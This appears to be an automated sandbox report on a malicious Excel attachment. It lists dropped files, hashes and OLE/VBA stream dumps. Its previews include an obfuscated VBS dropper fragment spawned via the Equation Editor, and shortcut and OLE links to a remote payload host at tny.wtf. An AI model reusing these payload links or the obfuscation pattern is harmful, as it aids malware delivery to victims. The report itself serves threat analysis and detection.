                  File Type:MS Windows 95 Internet shortcut text (URL=<http://tny.wtf/>), ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):41
                  Entropy (8bit):4.2963379801223045
                  Encrypted:false
                  SSDEEP:3:HRAbABGQYm/3LcmWy:HRYFVm/3LOy
                  MD5:D591A53347F94FBC48B4B6A5CCE920ED
                  SHA1:C00082566F3211F9B1BBEC933A8AE164759C290A
                  SHA-256:1CA93696A94797C9411318830CAC6A5B26FEACC37D5CAA4B3742D722CD073781
                  SHA-512:BA14258049ABCC3E31AA3DFC3ABBC2949AF30BB73B031C0E408BCF036B51B7AC11E32C3B39A7952E1A007179720C970B29CB2DF8EF03A021EF3B59FEB5AE177E
                  Malicious:true
                  Preview:[InternetShortcut]..URL=http://tny.wtf/..

                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):162
                  Entropy (8bit):2.503835550707525
                  Encrypted:false
                  SSDEEP:3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
                  MD5:CB3D0F9D3F7204AF5670A294AB575B37
                  SHA1:5E792DFBAD5EDA9305FCF8F671F385130BB967D8
                  SHA-256:45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
                  SHA-512:BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
                  Malicious:false
                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                  C:\Users\user\AppData\Roaming\creatednewwaterbottleform.vBS

                  Download File
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):419812
                  Entropy (8bit):3.5814445916859183
                  Encrypted:false
                  SSDEEP:3072:FHGhwf2YFbhNe4VTdRnTT8w4TW7HqOOgVpp20KeLS7lixg36t+v4pNdS7ES:0wf2YFZHqf
                  MD5:94734CB139B6B9025FD8A1ACC56027DB
                  SHA1:B385368BCAADACA073849A413660B68E690FFBA5
                  SHA-256:7DDE4D5F845DBB2A078F6D0A290472D22CC845C6D6927CC0ADA645CE050C7B08
                  SHA-512:58E0064F4B304B5503C4A7E689D96CC62BAC4BC8EE76D39FEDE408B9E777B9602334DAD4E1570FA0B9E0C363E7D8EE419A41D4DA02493D174D61F96ACCA4053F
                  Malicious:true
                  Preview:..d.i.m. .p.l.a.t.i.n.a.m.i.n.a. .....p.l.a.t.i.n.a.m.i.n.a. .=. .m.e.l.e.a.n.t.e.....a.c.o.v.a.r.(.".m.a.r.a.n.h.a.r.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".d.r.u.p.a.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".i.n.d.i.g.e.n.a.t.o.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".m.u.l.h.e.r.i.n.h.a.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".X._.H.e.l.p.U.r.i.s._.0.0.5._.0._.M.e.s.s.a.g.e.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".a.n.t.r.o.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".m.a.s.c.a.r.a.d.a.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".X._.H.e.l.p.U.r.i.s._.0.0.8._.0._.M.e.s.s.a.g.e.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".X._.H.e.l.p.U.r.i.s._.0.0.9._.0._.M.e.s.s.a.g.e.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".X._.H.e.l.p.U.r.i.s._.0.1.0._.0._.M.e.s.s.a.g.e.".). .&. .p.l.a.t.i.n.a.m.i.n.a. .&. ._.....a.c.o.v.a.r.(.".L._.H.e.l.p.

                  C:\Users\user\Desktop\90530000

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 12:09:15 2024, Security: 1
                  Category:dropped
                  Size (bytes):1286656
                  Entropy (8bit):7.985271791399071
                  Encrypted:false
                  SSDEEP:24576:36sKGQKr9+FZF+S0ANklw1Q1Ftt5RV8yIQxpoUSIV/pgTNEEt5jpM9:BHr9+FZQNw1Q1l5rBIcqcpONEEt5ji9
                  MD5:0E5726EFB558653F8C1D495E51EB4887
                  SHA1:4E24194879DC923E024B9BCD7F9E2968709AEAE6
                  SHA-256:499DC1040CF41D124103D3A7858565009CED920AEFB34DEB48B9A9E97446560E
                  SHA-512:69E19E484551229921B843E9CF76F37B07E747E0CCEF127C2FC03752CC6712F7FD8B72679D4BB61704AF2DF476F2ED7CBCD566739C18595C24048AF39CBF85BD
                  Malicious:false
                  Preview:......................>...............................................................................................v.......x.......z.......|.......~................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                  C:\Users\user\Desktop\90530000:Zone.Identifier

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:false
                  Preview:[ZoneTransfer]....ZoneId=0

                  C:\Users\user\Desktop\AWD 490104998518.xls (copy)

                  Download File
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 12:09:15 2024, Security: 1
                  Category:dropped
                  Size (bytes):1286656
                  Entropy (8bit):7.985271791399071
                  Encrypted:false
                  SSDEEP:24576:36sKGQKr9+FZF+S0ANklw1Q1Ftt5RV8yIQxpoUSIV/pgTNEEt5jpM9:BHr9+FZQNw1Q1l5rBIcqcpONEEt5ji9
                  MD5:0E5726EFB558653F8C1D495E51EB4887
                  SHA1:4E24194879DC923E024B9BCD7F9E2968709AEAE6
                  SHA-256:499DC1040CF41D124103D3A7858565009CED920AEFB34DEB48B9A9E97446560E
                  SHA-512:69E19E484551229921B843E9CF76F37B07E747E0CCEF127C2FC03752CC6712F7FD8B72679D4BB61704AF2DF476F2ED7CBCD566739C18595C24048AF39CBF85BD
                  Malicious:true
                  Preview:......................>...............................................................................................v.......x.......z.......|.......~................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                  Static File Info

                  General

                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 03:46:25 2024, Security: 1
                  Entropy (8bit):7.9814638526740325
                  TrID:
                  • Microsoft Excel sheet (30009/1) 47.99%
                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                  File name:AWD 490104998518.xls
                  File size:1'302'528 bytes
                  MD5:f63c009bccbc4d8d26d162a168feaeb1
                  SHA1:fa8ab13582703932f968a31e6cc0973e45ca43e0
                  SHA256:f9541983f2c2e2f0a0a72dce180342d0637a52a4ba6e49ea42e8c5844d4de9e3
                  SHA512:56a099036928c0af89d6a4cde7977cf5f3a5626a028aabea8a4dc590dd582c395042ae2c4f05b8085b81a9d19fb12f18beea0fe145712f057ffc12028e063395
                  SSDEEP:24576:D6sKGQKr9+FZF+S0ANklw1Q1Ftt5Kj1G8RjM78quuH6OBrNoDgYEMuFh:9Hr9+FZQNw1Q1l5oGYjMhuu3BRo0Yr+
                  TLSH:3A552315FA4ADAA3EE2A9C790593D217223C6D62FF4582037745732EA03A36593C7F0D
                  File Content Preview:........................>...............................................................................................w.......y.......{.......}..............................................................................................................

                  File Icon

                  Icon Hash:276ea3a6a6b7bfbf

                  Static OLE Info

                  General

                  Document Type:OLE
                  Number of OLE Files:1

                  OLE File "AWD 490104998518.xls"

                  Indicators
                  Has Summary Info:
                  Application Name:Microsoft Excel
                  Encrypted Document:True
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:True
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:False
                  Flash Objects Count:0
                  Contains VBA Macros:True
                  Summary
                  Code Page:1252
                  Author:
                  Last Saved By:
                  Create Time:2006-09-16 00:00:00
                  Last Saved Time:2024-07-26 02:46:25
                  Creating Application:Microsoft Excel
                  Security:1
                  Document Summary
                  Document Code Page:1252
                  Thumbnail Scaling Desired:False
                  Contains Dirty Links:False
                  Shared Document:False
                  Changed Hyperlinks:False
                  Application Version:786432

                  Streams with VBA

                  VBA File Name: Sheet1.cls, Stream Size: 977
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                  VBA File Name:Sheet1.cls
                  Stream Size:977
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F 3 I . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 46 33 49 19 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  VBA Code
                  Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                  VBA File Name: Sheet2.cls, Stream Size: 977
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                  VBA File Name:Sheet2.cls
                  Stream Size:977
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F 3 u _ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 46 33 75 5f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  VBA Code
                  Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                  VBA File Name: Sheet3.cls, Stream Size: 977
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                  VBA File Name:Sheet3.cls
                  Stream Size:977
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F 3 V D . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 46 33 56 44 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  VBA Code
                  Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                  VBA File Name: ThisWorkbook.cls, Stream Size: 985
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                  VBA File Name:ThisWorkbook.cls
                  Stream Size:985
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 46 33 a2 b6 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  VBA Code
                  Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                  Streams

                  Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                  General
                  Stream Path:\x1CompObj
                  CLSID:
                  File Type:data
                  Stream Size:114
                  Entropy:4.25248375192737
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                  General
                  Stream Path:\x5DocumentSummaryInformation
                  CLSID:
                  File Type:data
                  Stream Size:244
                  Entropy:2.889430592781307
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                  General
                  Stream Path:\x5SummaryInformation
                  CLSID:
                  File Type:data
                  Stream Size:200
                  Entropy:3.272567433052416
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                  Stream Path: MBD001EFDD9/\x1CompObj, File Type: data, Stream Size: 99
                  General
                  Stream Path:MBD001EFDD9/\x1CompObj
                  CLSID:
                  File Type:data
                  Stream Size:99
                  Entropy:3.631242196770981
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                  Stream Path: MBD001EFDD9/Package, File Type: Microsoft Excel 2007+, Stream Size: 642300
                  General
                  Stream Path:MBD001EFDD9/Package
                  CLSID:
                  File Type:Microsoft Excel 2007+
                  Stream Size:642300
                  Entropy:7.9807610130647495
                  Base64 Encoded:True
                  Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 d4 fe 94 9a b9 01 00 00 c0 06 00 00 13 00 d1 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cd 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Stream Path: MBD001EFDDA/\x1Ole, File Type: data, Stream Size: 788
                  General
                  Stream Path:MBD001EFDDA/\x1Ole
                  CLSID:
                  File Type:data
                  Stream Size:788
                  Entropy:5.849931837532327
                  Base64 Encoded:False
                  Data ASCII:. . . . P . 4 . . . . . . . . . . . . ( . . . y . . . K . $ . . . h . t . t . p . : . / . / . t . n . y . . . w . t . f . / . s . A . . . . . k . 1 . b K F w ` : 5 _ W X - { . L W F u m . I . i . f r 0 . . j . . ( . ] N K . . . . = g . V y e . 4 P @ + . u 5 a l . ( . . . : ' . . w $ + . V k i P . . . . . * g % A 9 b . 9 W " & < r I h . w . Q J . 4 . A / U 4 m . . @ J . . . . . . . . . . . . . . . . . . . . x . p . 8 . H . 4 . y . E . F . Y . v . g . Q . r . W . j . z . m . 9 . S . Q . 0 . J . w . T . k
                  Data Raw:01 00 00 02 d5 50 f4 03 c4 ef d3 34 00 00 00 00 00 00 00 00 00 00 00 00 28 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 24 01 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 74 00 6e 00 79 00 2e 00 77 00 74 00 66 00 2f 00 73 00 41 00 00 00 96 f1 f0 c2 96 da f3 1a 6b d9 e6 80 9d 31 be 04 62 4b 46 77 e8 f3 60 af 93 9a 3a c9 35 94 a1 5f 57 58 2d d7 7b c4 8d 95 4c 57 c5 46
                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 635801
                  General
                  Stream Path:Workbook
                  CLSID:
                  File Type:Applesoft BASIC program data, first line number 16
                  Stream Size:635801
                  Entropy:7.99943136040081
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . [ . f . + . | q . [ . $ s r f . T . n % { | % t X . . . v . . . . . . . h . . . \\ . p . m 6 . y 9 6 . . . . & ~ 1 e . . . i . z : 2 C . _ < ? T > . . T # j E 3 ' b ) C < . g 0 2 . @ s l . . . M w c W O i m 4 . 9 f v . $ S B . . . p a . . . . . . = . . . . { l d > J . . . F u . R . O [ ; . . . . . . . . . . . . 4 . . . . ) . . . . . . . B = . . . F ; ' . 0 . ] e . @ . . . . . . . M " . . . . . . . . . . . . . . . . g 1 . . . 7 < . . k . . R U + . x o 1
                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5b 18 a9 97 e6 66 88 1e 2b 00 ba 7c 71 e4 d1 0d b1 5b 01 81 24 d3 73 72 db 66 11 54 0e 6e a6 25 e4 7b be 7c 25 74 b2 58 8b 92 13 c5 bb c4 a8 76 e1 00 02 00 b0 04 c1 00 02 00 be 68 e2 00 00 00 5c 00 70 00 fc 6d 36 08 79 39 af 36 cc aa d5 fe a3 a6 9a c7 91 06 1b 26 7e a9 c4 31 cd 65 1c 14 1a 99
                  Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527
                  General
                  Stream Path:_VBA_PROJECT_CUR/PROJECT
                  CLSID:
                  File Type:ASCII text, with CRLF line terminators
                  Stream Size:527
                  Entropy:5.27186694728929
                  Base64 Encoded:True
                  Data ASCII:I D = " { 2 6 2 4 1 6 F 0 - 4 4 5 D - 4 6 C 2 - B 6 7 D - 7 C B C 5 3 C 7 0 8 E F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 6 4 6 6 B A 2 1 7 A 8 2 7 E 8 2 7
                  Data Raw:49 44 3d 22 7b 32 36 32 34 31 36 46 30 2d 34 34 35 44 2d 34 36 43 32 2d 42 36 37 44 2d 37 43 42 43 35 33 43 37 30 38 45 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                  Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                  General
                  Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                  CLSID:
                  File Type:data
                  Stream Size:104
                  Entropy:3.0488640812019017
                  Base64 Encoded:False
                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                  Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                  CLSID:
                  File Type:data
                  Stream Size:2644
                  Entropy:3.9688732230623827
                  Base64 Encoded:False
                  Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
